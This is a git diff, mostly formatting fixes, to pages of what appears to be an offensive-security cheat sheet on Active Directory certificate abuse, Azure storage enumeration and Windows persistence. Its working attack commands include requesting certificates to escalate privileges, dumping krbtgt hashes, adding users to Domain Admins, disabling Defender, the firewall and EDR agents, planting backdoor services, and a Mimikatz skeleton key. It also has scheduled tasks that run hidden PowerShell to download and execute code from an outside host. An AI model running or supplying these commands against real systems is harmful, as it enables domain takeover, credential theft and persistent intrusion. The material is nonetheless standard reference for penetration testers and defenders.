> If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
|
> If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
|
||||||
|
@ -403,31 +433,33 @@ Members : {}
|
||||||
**Exploitation**:
|
**Exploitation**:
|
||||||
|
|
||||||
* Request a certificate for the vulnerable template
|
* Request a certificate for the vulnerable template
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
PS C:\> .\Certify.exe request /ca:DC01\dumpster-DC01-CA /template:ESC13Template
|
PS C:\> .\Certify.exe request /ca:DC01\dumpster-DC01-CA /template:ESC13Template
|
||||||
```
|
```
|
||||||
|
|
||||||
* Merge into a PFX file
|
* Merge into a PFX file
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
PS C:\> certutil -MergePFX .\esc13.pem .\esc13.pfx
|
PS C:\> certutil -MergePFX .\esc13.pem .\esc13.pfx
|
||||||
```
|
```
|
||||||
|
|
||||||
* Verify the presence of the "Client Authentication" and the "Policy Identifier"
|
* Verify the presence of the "Client Authentication" and the "Policy Identifier"
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
PS C:\> certutil -Dump -v .\esc13.pfx
|
PS C:\> certutil -Dump -v .\esc13.pfx
|
||||||
```
|
```
|
||||||
|
|
||||||
* Ask a TGT for our user, but we are also member of the linked group and inherited their privileges
|
* Ask a TGT for our user, but we are also member of the linked group and inherited their privileges
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
PS C:\> .\Rubeus.exe asktgt /user:ESC13User /certificate:C:\esc13.pfx /nowrap
|
PS C:\> .\Rubeus.exe asktgt /user:ESC13User /certificate:C:\esc13.pfx /nowrap
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## ESC15 - EKUwu Application Policies - CVE-2024-49019
|
## ESC15 - EKUwu Application Policies - CVE-2024-49019
|
||||||
|
|
||||||
This technique now has a CVE number and was patched on November 12, See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019) for more information.
|
This technique now has a CVE number and was patched on November 12, See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019) for more information.
|
||||||
|
|
||||||
|
|
||||||
**Requirements**
|
**Requirements**
|
||||||
|
|
||||||
* **Template Schema** Version 1
|
* **Template Schema** Version 1
|
||||||
|
@ -446,7 +478,6 @@ If there is a conflict between an Application Policy and an EKU, then Microsoft
|
||||||
|
|
||||||
> "Application policy is Microsoft specific and is treated much like Extended Key Usage. If a certificate has an extension containing an application policy and also has an EKU extension, the EKU extension is ignored." - Microsoft
|
> "Application policy is Microsoft specific and is treated much like Extended Key Usage. If a certificate has an extension containing an application policy and also has an EKU extension, the EKU extension is ignored." - Microsoft
|
||||||
|
|
||||||
|
|
||||||
When a user requests a certificate based on a schema version 1 template and includes an application policy, the policy is incorporated into the certificate. This allows users to specify arbitrary EKUs, bypassing the requirements for ESC2.
|
When a user requests a certificate based on a schema version 1 template and includes an application policy, the policy is incorporated into the certificate. This allows users to specify arbitrary EKUs, bypassing the requirements for ESC2.
|
||||||
|
|
||||||
**ESC1** - The WebServer template is enabled by default in ADCS, requires a user-supplied SAN and only has the `Server Authentication` EKU. Using [ly4k/Certipy PR #228](https://github.com/ly4k/Certipy/pull/228), we can add the `Client Authentication` EKU to `WebServer`. Anybody with the `Enroll` permission on this template can now compromise the domain.
|
**ESC1** - The WebServer template is enabled by default in ADCS, requires a user-supplied SAN and only has the `Server Authentication` EKU. Using [ly4k/Certipy PR #228](https://github.com/ly4k/Certipy/pull/228), we can add the `Client Authentication` EKU to `WebServer`. Anybody with the `Enroll` permission on this template can now compromise the domain.
|
||||||
|
@ -460,7 +491,6 @@ add_user pentest_user
|
||||||
add_user_to_group pentest_user "Domain Admins"
|
add_user_to_group pentest_user "Domain Admins"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
**ESC2/ESC3** - **Certificate Request Agent** (`1.3.6.1.4.1.311.20.2.1`),
|
**ESC2/ESC3** - **Certificate Request Agent** (`1.3.6.1.4.1.311.20.2.1`),
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
|
@ -469,37 +499,47 @@ certipy -req -u user@domain.com -p 'P@ssw0rd' -on-behalf-of DOMAIN\\Administrato
|
||||||
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
|
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Certifried CVE-2022-26923
|
## Certifried CVE-2022-26923
|
||||||
|
|
||||||
> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
|
> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.
|
||||||
|
|
||||||
* Find `ms-DS-MachineAccountQuota`
|
* Find `ms-DS-MachineAccountQuota`
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
bloodyAD -d lab.local -u username -p 'Password123*' --host 10.10.10.10 get object 'DC=lab,DC=local' --attr ms-DS-MachineAccountQuota
|
bloodyAD -d lab.local -u username -p 'Password123*' --host 10.10.10.10 get object 'DC=lab,DC=local' --attr ms-DS-MachineAccountQuota
|
||||||
```
|
```
|
||||||
|
|
||||||
* Add a new computer in the Active Directory, by default `MachineAccountQuota = 10`
|
* Add a new computer in the Active Directory, by default `MachineAccountQuota = 10`
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
bloodyAD -d lab.local -u username -p 'Password123*' --host 10.10.10.10 add computer cve 'CVEPassword1234*'
|
bloodyAD -d lab.local -u username -p 'Password123*' --host 10.10.10.10 add computer cve 'CVEPassword1234*'
|
||||||
certipy account create 'lab.local/username:Password123*@dc.lab.local' -user 'cve' -dns 'dc.lab.local'
|
certipy account create 'lab.local/username:Password123*@dc.lab.local' -user 'cve' -dns 'dc.lab.local'
|
||||||
```
|
```
|
||||||
|
|
||||||
* [ALTERNATIVE] If you are `SYSTEM` and the `MachineAccountQuota=0`: Use a ticket for the current machine and reset its SPN
|
* [ALTERNATIVE] If you are `SYSTEM` and the `MachineAccountQuota=0`: Use a ticket for the current machine and reset its SPN
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Rubeus.exe tgtdeleg
|
Rubeus.exe tgtdeleg
|
||||||
export KRB5CCNAME=/tmp/ws02.ccache
|
export KRB5CCNAME=/tmp/ws02.ccache
|
||||||
bloodyAD -d lab.local -u 'ws02$' -k --host dc.lab.local set object 'CN=ws02,CN=Computers,DC=lab,DC=local' servicePrincipalName
|
bloodyAD -d lab.local -u 'ws02$' -k --host dc.lab.local set object 'CN=ws02,CN=Computers,DC=lab,DC=local' servicePrincipalName
|
||||||
```
|
```
|
||||||
|
|
||||||
* Set the `dNSHostName` attribute to match the Domain Controller hostname
|
* Set the `dNSHostName` attribute to match the Domain Controller hostname
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
bloodyAD -d lab.local -u username -p 'Password123*' --host 10.10.10.10 set object 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName -v DC.lab.local
|
bloodyAD -d lab.local -u username -p 'Password123*' --host 10.10.10.10 set object 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName -v DC.lab.local
|
||||||
bloodyAD -d lab.local -u username -p 'Password123*' --host 10.10.10.10 get object 'CN=cve,CN=Computers,DC=lab,DC=local' --attr dNSHostName
|
bloodyAD -d lab.local -u username -p 'Password123*' --host 10.10.10.10 get object 'CN=cve,CN=Computers,DC=lab,DC=local' --attr dNSHostName
|
||||||
```
|
```
|
||||||
|
|
||||||
* Request a ticket
|
* Request a ticket
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# certipy req 'domain.local/cve$:CVEPassword1234*@ADCS_IP' -template Machine -dc-ip DC_IP -ca discovered-CA
|
# certipy req 'domain.local/cve$:CVEPassword1234*@ADCS_IP' -template Machine -dc-ip DC_IP -ca discovered-CA
|
||||||
certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
|
certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
|
||||||
```
|
```
|
||||||
|
|
||||||
* Either use the pfx or set a RBCD on your machine account to takeover the domain
|
* Either use the pfx or set a RBCD on your machine account to takeover the domain
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
certipy auth -pfx ./dc.pfx -dc-ip 10.10.10.10
|
certipy auth -pfx ./dc.pfx -dc-ip 10.10.10.10
|
||||||
|
|
||||||
|
@ -509,12 +549,12 @@ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
|
||||||
secretsdump.py -user-status -just-dc-ntlm -just-dc-user krbtgt 'lab.local/Administrator@dc.lab.local' -k -no-pass -dc-ip 10.10.10.10 -target-ip 10.10.10.10
|
secretsdump.py -user-status -just-dc-ntlm -just-dc-user krbtgt 'lab.local/Administrator@dc.lab.local' -k -no-pass -dc-ip 10.10.10.10 -target-ip 10.10.10.10
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Pass-The-Certificate
|
## Pass-The-Certificate
|
||||||
|
|
||||||
> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential"
|
> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential"
|
||||||
|
|
||||||
* Windows
|
* Windows
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# Information about a cert file
|
# Information about a cert file
|
||||||
certutil -v -dump admin.pfx
|
certutil -v -dump admin.pfx
|
||||||
|
@ -527,7 +567,9 @@ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
|
||||||
# To restore
|
# To restore
|
||||||
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt
|
./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
* Linux
|
* Linux
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# Base64-encoded PFX certificate (string) (password can be set)
|
# Base64-encoded PFX certificate (string) (password can be set)
|
||||||
gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||||
|
@ -543,17 +585,19 @@ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
|
||||||
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
|
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## UnPAC The Hash
|
## UnPAC The Hash
|
||||||
|
|
||||||
Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
|
Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
|
||||||
|
|
||||||
* Windows
|
* Windows
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
|
# Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
|
||||||
Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
||||||
```
|
```
|
||||||
|
|
||||||
* Linux
|
* Linux
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# Obtain a TGT by validating a PKINIT pre-authentication
|
# Obtain a TGT by validating a PKINIT pre-authentication
|
||||||
$ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
$ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||||
|
@ -562,7 +606,6 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
|
||||||
$ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
|
$ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
||||||
|
|
|
@ -5,7 +5,6 @@
|
||||||
* Data Tables - `*.table.core.windows.net`
|
* Data Tables - `*.table.core.windows.net`
|
||||||
* Queues - `*.queue.core.windows.net`
|
* Queues - `*.queue.core.windows.net`
|
||||||
|
|
||||||
|
|
||||||
## Enumerate blobs
|
## Enumerate blobs
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -14,7 +13,6 @@ PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
|
||||||
Found Storage Account - redacted.blob.core.windows.net
|
Found Storage Account - redacted.blob.core.windows.net
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## List and download blobs
|
## List and download blobs
|
||||||
|
|
||||||
Visiting `https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list` provides a JSON file containing a complete list of the Azure Blobs.
|
Visiting `https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list` provides a JSON file containing a complete list of the Azure Blobs.
|
||||||
|
@ -50,7 +48,6 @@ $ curl -s -H "x-ms-version: 2019-12-12" 'https://<storage-name>.blob.core.window
|
||||||
<Name>scripts-transfer.zip</Name>
|
<Name>scripts-transfer.zip</Name>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
PS Az> Get-AzResource
|
PS Az> Get-AzResource
|
||||||
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
||||||
|
@ -64,7 +61,6 @@ Retrieve exposed containers with public access
|
||||||
PS Az> (Get-AzStorageAccount | Get-AzStorageContainer).cloudBlobContainer | select Uri,@{n='PublicAccess';e={$_.Properties.PublicAccess}}
|
PS Az> (Get-AzStorageAccount | Get-AzStorageContainer).cloudBlobContainer | select Uri,@{n='PublicAccess';e={$_.Properties.PublicAccess}}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## SAS URL
|
## SAS URL
|
||||||
|
|
||||||
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
|
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
|
||||||
|
@ -76,7 +72,6 @@ PS Az> (Get-AzStorageAccount | Get-AzStorageContainer).cloudBlobContainer | sele
|
||||||
|
|
||||||
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
|
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
|
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
|
|
@ -36,10 +36,9 @@
|
||||||
* [Golden Ticket](#golden-ticket)
|
* [Golden Ticket](#golden-ticket)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
|
* [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
|
||||||
|
|
||||||
## Hide Your Binary
|
## Hide Your Binary
|
||||||
|
|
||||||
|
@ -56,13 +55,16 @@ PS> attrib +h mimikatz.exe
|
||||||
* [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/)
|
* [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/)
|
||||||
* [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html)
|
* [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html)
|
||||||
* [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html)
|
* [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html)
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
cd "C:\Program Files\Elastic\Agent\"
|
cd "C:\Program Files\Elastic\Agent\"
|
||||||
PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
|
PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
|
||||||
Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
|
Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
|
||||||
Elastic Agent has been uninstalled.
|
Elastic Agent has been uninstalled.
|
||||||
```
|
```
|
||||||
|
|
||||||
* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/)
|
* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/)
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# Global uninstall password: Password1
|
# Global uninstall password: Password1
|
||||||
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
|
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
|
||||||
|
@ -123,7 +125,6 @@ reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpywa
|
||||||
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Disable Windows Firewall
|
### Disable Windows Firewall
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -193,19 +194,23 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -
|
||||||
### Scheduled Tasks User
|
### Scheduled Tasks User
|
||||||
|
|
||||||
* Using native **schtask** - Create a new task
|
* Using native **schtask** - Create a new task
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Create the scheduled tasks to run once at 00.00
|
# Create the scheduled tasks to run once at 00.00
|
||||||
schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
|
schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
|
||||||
# Force run it now !
|
# Force run it now !
|
||||||
schtasks /run /tn "Device-Synchronize"
|
schtasks /run /tn "Device-Synchronize"
|
||||||
```
|
```
|
||||||
|
|
||||||
* Using native **schtask** - Leverage the `schtasks /change` command to modify existing scheduled tasks
|
* Using native **schtask** - Leverage the `schtasks /change` command to modify existing scheduled tasks
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Launch an executable by calling the ShellExec_RunDLL function.
|
# Launch an executable by calling the ShellExec_RunDLL function.
|
||||||
SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE
|
SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE
|
||||||
```
|
```
|
||||||
|
|
||||||
* Using Powershell
|
* Using Powershell
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
|
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
|
||||||
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
|
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
|
||||||
|
@ -216,6 +221,7 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -
|
||||||
```
|
```
|
||||||
|
|
||||||
* Using SharPersist
|
* Using SharPersist
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Add to a current scheduled task
|
# Add to a current scheduled task
|
||||||
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
|
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
|
||||||
|
@ -225,7 +231,6 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -
|
||||||
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
|
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### BITS Jobs
|
### BITS Jobs
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -242,14 +247,12 @@ bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.1
|
||||||
bitsadmin /resume backdoor
|
bitsadmin /resume backdoor
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### COM TypeLib
|
### COM TypeLib
|
||||||
|
|
||||||
* [CICADA8-Research/TypeLibWalker](https://github.com/CICADA8-Research/TypeLibWalker) - TypeLib persistence technique
|
* [CICADA8-Research/TypeLibWalker](https://github.com/CICADA8-Research/TypeLibWalker) - TypeLib persistence technique
|
||||||
|
|
||||||
Use [sysinternals/procmon](https://learn.microsoft.com/fr-fr/sysinternals/downloads/procmon) to find `RegOpenKey` with the status `NAME NOT FOUND`. The process `explorer.exe` is a good target, as it will spawn your payload every time it is run.
|
Use [sysinternals/procmon](https://learn.microsoft.com/fr-fr/sysinternals/downloads/procmon) to find `RegOpenKey` with the status `NAME NOT FOUND`. The process `explorer.exe` is a good target, as it will spawn your payload every time it is run.
|
||||||
|
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32
|
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32
|
||||||
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win64
|
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win64
|
||||||
|
@ -279,7 +282,6 @@ Example of content for `1.sct`.
|
||||||
</scriptlet>
|
</scriptlet>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Serviceland
|
## Serviceland
|
||||||
|
|
||||||
### IIS
|
### IIS
|
||||||
|
@ -334,7 +336,6 @@ Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
|
||||||
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force
|
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
#### GlobalFlag
|
#### GlobalFlag
|
||||||
|
|
||||||
> Run executable after notepad is killed
|
> Run executable after notepad is killed
|
||||||
|
@ -370,7 +371,6 @@ sc create Backdoor binpath= "cmd.exe /k C:\temp\backdoor.exe" start="auto" obj="
|
||||||
sc start Backdoor
|
sc start Backdoor
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### ServiceSecurityDescriptor
|
### ServiceSecurityDescriptor
|
||||||
|
|
||||||
Allow any arbitrary non-administrative user to have full SYSTEM permissions on a machine persistently by feeding an overly permissive ACL to the service control manager with sdset.
|
Allow any arbitrary non-administrative user to have full SYSTEM permissions on a machine persistently by feeding an overly permissive ACL to the service control manager with sdset.
|
||||||
|
@ -409,7 +409,6 @@ sc create LPE displayName= "LPE" binPath= "C:\Windows\System32\net.exe localgrou
|
||||||
|
|
||||||
Then you need to wait for a reboot for the service to automatically start and grant the user with elevated privilege or any persistence mechanism you specified in the `binPath`.
|
Then you need to wait for a reboot for the service to automatically start and grant the user with elevated privilege or any persistence mechanism you specified in the `binPath`.
|
||||||
|
|
||||||
|
|
||||||
### Scheduled Tasks Elevated
|
### Scheduled Tasks Elevated
|
||||||
|
|
||||||
Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day.
|
Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day.
|
||||||
|
@ -451,12 +450,10 @@ schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v
|
||||||
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30
|
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Windows Management Instrumentation Event Subscription
|
### Windows Management Instrumentation Event Subscription
|
||||||
|
|
||||||
> An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.
|
> An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.
|
||||||
|
|
||||||
|
|
||||||
* **__EventFilter**: Trigger (new process, failed logon etc.)
|
* **__EventFilter**: Trigger (new process, failed logon etc.)
|
||||||
* **EventConsumer**: Perform Action (execute payload etc.)
|
* **EventConsumer**: Perform Action (execute payload etc.)
|
||||||
* **__FilterToConsumerBinding**: Binds Filter and Consumer Classes
|
* **__FilterToConsumerBinding**: Binds Filter and Consumer Classes
|
||||||
|
@ -485,7 +482,6 @@ $EventConsumerToCleanup | Remove-WmiObject
|
||||||
$EventFilterToCleanup | Remove-WmiObject
|
$EventFilterToCleanup | Remove-WmiObject
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Binary Replacement
|
### Binary Replacement
|
||||||
|
|
||||||
#### Binary Replacement on Windows XP+
|
#### Binary Replacement on Windows XP+
|
||||||
|
@ -508,12 +504,12 @@ Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** exec
|
||||||
|
|
||||||
Create a malicious **HID.dll** in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`.
|
Create a malicious **HID.dll** in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`.
|
||||||
|
|
||||||
|
|
||||||
### Skeleton Key
|
### Skeleton Key
|
||||||
|
|
||||||
> Inject a master password into the LSASS process of a Domain Controller.
|
> Inject a master password into the LSASS process of a Domain Controller.
|
||||||
|
|
||||||
Requirements:
|
Requirements:
|
||||||
|
|
||||||
* Domain Administrator (SeDebugPrivilege) or `NTAUTHORITY\SYSTEM`
|
* Domain Administrator (SeDebugPrivilege) or `NTAUTHORITY\SYSTEM`
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -525,7 +521,6 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC
|
||||||
